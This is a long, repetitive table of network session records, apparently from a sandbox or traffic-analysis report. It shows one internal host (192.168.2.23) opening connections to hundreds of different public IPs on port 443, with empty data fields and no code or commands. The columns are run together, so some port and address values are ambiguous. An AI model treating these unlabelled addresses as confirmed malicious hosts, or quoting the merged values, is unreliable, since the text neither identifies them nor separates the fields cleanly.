                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13489192.168.2.2335694210.164.167.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13490192.168.2.2336852175.5.156.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13491192.168.2.2333228189.89.234.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13492192.168.2.2340982165.54.127.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13493192.168.2.2355012199.249.251.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13494192.168.2.2359838169.222.182.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13495192.168.2.2356014198.179.200.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13496192.168.2.2350698181.177.28.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13497192.168.2.2340978204.176.220.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13498192.168.2.233755073.16.1.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13499192.168.2.235511485.186.231.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13500192.168.2.234179024.66.143.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13501192.168.2.2339758207.3.111.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13502192.168.2.2355036221.93.189.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13503192.168.2.234166468.43.99.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13504192.168.2.2346066112.199.23.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13505192.168.2.2335104220.217.36.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13506192.168.2.2347654146.194.139.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13507192.168.2.2359722179.206.44.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13508192.168.2.2334324144.182.215.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13509192.168.2.2347464148.234.196.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13510192.168.2.2333596206.105.204.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13511192.168.2.23399762.115.188.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13512192.168.2.2355790114.68.84.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13513192.168.2.233531668.114.194.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13514192.168.2.234160642.2.207.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13515192.168.2.2356768166.65.96.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13516192.168.2.235624050.237.123.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13517192.168.2.235680440.93.209.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13518192.168.2.2345098212.234.229.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13519192.168.2.2355016137.179.62.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13520192.168.2.234429019.220.120.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13521192.168.2.2338694219.79.234.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13522192.168.2.233736090.218.187.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13523192.168.2.2335162218.196.10.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13524192.168.2.2341140128.22.141.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13525192.168.2.233675043.177.162.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13526192.168.2.234022014.198.154.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13527192.168.2.233379041.68.229.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13528192.168.2.2350748155.216.246.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13529192.168.2.2348350139.151.23.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13530192.168.2.2339686213.139.27.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13531192.168.2.233501667.79.184.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13532192.168.2.2343362116.224.189.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13533192.168.2.235947681.12.106.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13534192.168.2.2354626203.239.28.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13535192.168.2.2334706105.71.176.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13536192.168.2.2337398112.33.159.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13537192.168.2.234053481.74.169.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13538192.168.2.234127486.58.153.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13539192.168.2.234173688.128.153.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13540192.168.2.2350760192.102.175.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13541192.168.2.2339234179.128.140.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13542192.168.2.235657476.96.59.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13543192.168.2.235358684.157.8.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13544192.168.2.235713239.119.178.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13545192.168.2.235791639.136.49.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13546192.168.2.2345844186.99.174.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13547192.168.2.23454764.180.253.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13548192.168.2.2339432130.92.240.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13549192.168.2.2335456169.32.27.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13550192.168.2.233498432.211.229.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13551192.168.2.2354112185.221.96.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13552192.168.2.235764419.243.119.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13553192.168.2.235642643.41.112.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13554192.168.2.2333304124.106.152.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13555192.168.2.2359996211.112.7.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13556192.168.2.234313686.160.75.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13557192.168.2.2336466138.151.153.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13558192.168.2.233368681.255.77.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13559192.168.2.2352376134.148.183.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13560192.168.2.235266073.49.102.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13561192.168.2.2345052115.200.250.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13562192.168.2.236056297.14.171.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13563192.168.2.234586662.13.195.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13564192.168.2.235412035.13.5.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13565192.168.2.234129888.182.215.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13566192.168.2.2347878107.132.88.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13567192.168.2.23410001.50.52.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13568192.168.2.2352646143.232.100.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13569192.168.2.235417470.202.21.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13570192.168.2.2343800180.221.163.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13571192.168.2.234899860.57.225.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13572192.168.2.235694469.66.196.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13573192.168.2.2357644166.13.85.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13574192.168.2.2354088191.219.56.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13575192.168.2.234006453.138.34.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13576192.168.2.2342490217.47.1.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13577192.168.2.2347368145.82.81.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13578192.168.2.2358630107.29.98.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13579192.168.2.2358124219.90.240.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13580192.168.2.234989619.173.145.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13581192.168.2.234974254.99.110.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13582192.168.2.235464899.1.243.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13583192.168.2.2348246128.197.12.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13584192.168.2.233940638.215.167.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13585192.168.2.235416868.72.194.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13586192.168.2.23444464.84.146.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13587192.168.2.235879442.59.21.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13588192.168.2.2349700120.157.148.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13589192.168.2.2360412167.219.7.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13590192.168.2.2359404160.110.110.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13591192.168.2.2350920156.15.200.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13592192.168.2.2337012222.227.241.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13593192.168.2.234881464.13.108.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13594192.168.2.233586263.51.252.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13595192.168.2.235067469.202.97.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13596192.168.2.2355070196.111.61.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13597192.168.2.2337432167.242.40.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13598192.168.2.2337814143.88.107.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13599192.168.2.2359312133.252.199.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13600192.168.2.2334834111.250.13.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13601192.168.2.2335484135.160.97.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13602192.168.2.2343588157.144.0.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13603192.168.2.234976642.18.83.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13604192.168.2.2349974165.112.223.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13605192.168.2.233780069.130.229.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13606192.168.2.2353694162.12.131.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13607192.168.2.2354576210.246.221.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13608192.168.2.2350882112.10.253.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13609192.168.2.2339888193.202.73.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13610192.168.2.235451492.15.31.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13611192.168.2.234878045.30.114.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13612192.168.2.235504292.37.165.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13613192.168.2.2337738146.0.204.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13614192.168.2.2348562119.63.208.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13615192.168.2.2344266185.97.89.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13616192.168.2.2337886200.115.30.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13617192.168.2.236066870.131.116.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13618192.168.2.2343350125.138.235.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13619192.168.2.2335284186.8.34.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13620192.168.2.2337590167.195.226.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13621192.168.2.235978031.67.57.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13622192.168.2.2348988114.82.6.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13623192.168.2.2359734110.212.162.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13624192.168.2.235952891.206.158.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13625192.168.2.2341936135.250.219.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13626192.168.2.2340306208.70.242.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13627192.168.2.2355640219.160.19.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13628192.168.2.234874057.101.207.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13629192.168.2.234066682.244.217.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13630192.168.2.2336746191.56.168.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13631192.168.2.2351686205.182.10.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13632192.168.2.2356510223.2.106.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13633192.168.2.2344692137.157.85.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13634192.168.2.233964079.58.217.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13635192.168.2.2351434149.7.191.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13636192.168.2.2358120106.55.244.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13637192.168.2.235320671.92.30.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13638192.168.2.2350086193.114.125.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13639192.168.2.235152213.179.148.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13640192.168.2.235513482.92.160.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13641192.168.2.235103876.11.48.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13642192.168.2.234750057.208.79.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13643192.168.2.2343462105.166.57.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13644192.168.2.2346232108.234.83.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13645192.168.2.2357716171.134.80.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13646192.168.2.2333574147.23.120.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13647192.168.2.233493485.24.23.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13648192.168.2.233705491.185.207.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13649192.168.2.234048864.244.203.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13650192.168.2.233771845.132.169.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13651192.168.2.2357522110.75.75.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13652192.168.2.2348460193.163.166.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13653192.168.2.233984817.88.190.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13654192.168.2.235274689.177.160.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13655192.168.2.235629072.254.246.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13656192.168.2.2344352108.44.31.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13657192.168.2.2354376216.244.56.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13658192.168.2.2345304154.49.95.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13659192.168.2.234097076.166.242.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13660192.168.2.2351846147.243.66.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13661192.168.2.235754419.11.175.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13662192.168.2.2352546205.104.133.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13663192.168.2.234078231.106.148.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13664192.168.2.2355134154.51.164.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13665192.168.2.2354760121.52.84.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13666192.168.2.2352296145.30.169.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13667192.168.2.2346048161.60.126.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13668192.168.2.235531082.180.88.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13669192.168.2.2345394170.188.255.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13670192.168.2.2355044210.141.144.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13671192.168.2.2345904185.70.110.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13672192.168.2.234221676.132.229.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13673192.168.2.234555682.245.73.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13674192.168.2.2347392157.89.162.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13675192.168.2.2344182171.139.185.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13676192.168.2.2357746171.186.75.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13677192.168.2.234748284.96.12.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13678192.168.2.235321084.101.39.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13679192.168.2.2338992191.22.217.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13680192.168.2.2334564182.17.35.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13681192.168.2.2336240217.82.158.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13682192.168.2.2346336203.1.183.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13683192.168.2.2333958173.59.130.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13684192.168.2.2352712184.93.236.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13685192.168.2.2342896100.222.52.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13686192.168.2.23492965.234.140.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13687192.168.2.233288238.150.8.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13688192.168.2.234913273.7.146.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13689192.168.2.2345618217.28.234.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13690192.168.2.2349820195.224.143.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13691192.168.2.233903623.163.102.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13692192.168.2.236050859.34.235.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13693192.168.2.2340682213.225.249.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13694192.168.2.2348866132.100.221.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13695192.168.2.2339652110.21.227.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13696192.168.2.2335722170.55.212.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13697192.168.2.2336270119.145.11.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13698192.168.2.2339258143.238.46.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13699192.168.2.233527872.76.250.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13700192.168.2.2333126163.170.132.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13701192.168.2.234290697.167.97.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13702192.168.2.234609018.116.56.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13703192.168.2.2357398174.252.168.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13704192.168.2.2344412206.81.21.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13705192.168.2.235954875.214.26.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13706192.168.2.2351734154.29.11.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13707192.168.2.235336684.151.201.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13708192.168.2.2338446153.243.80.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13709192.168.2.234861446.252.235.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13710192.168.2.236052089.156.65.35443
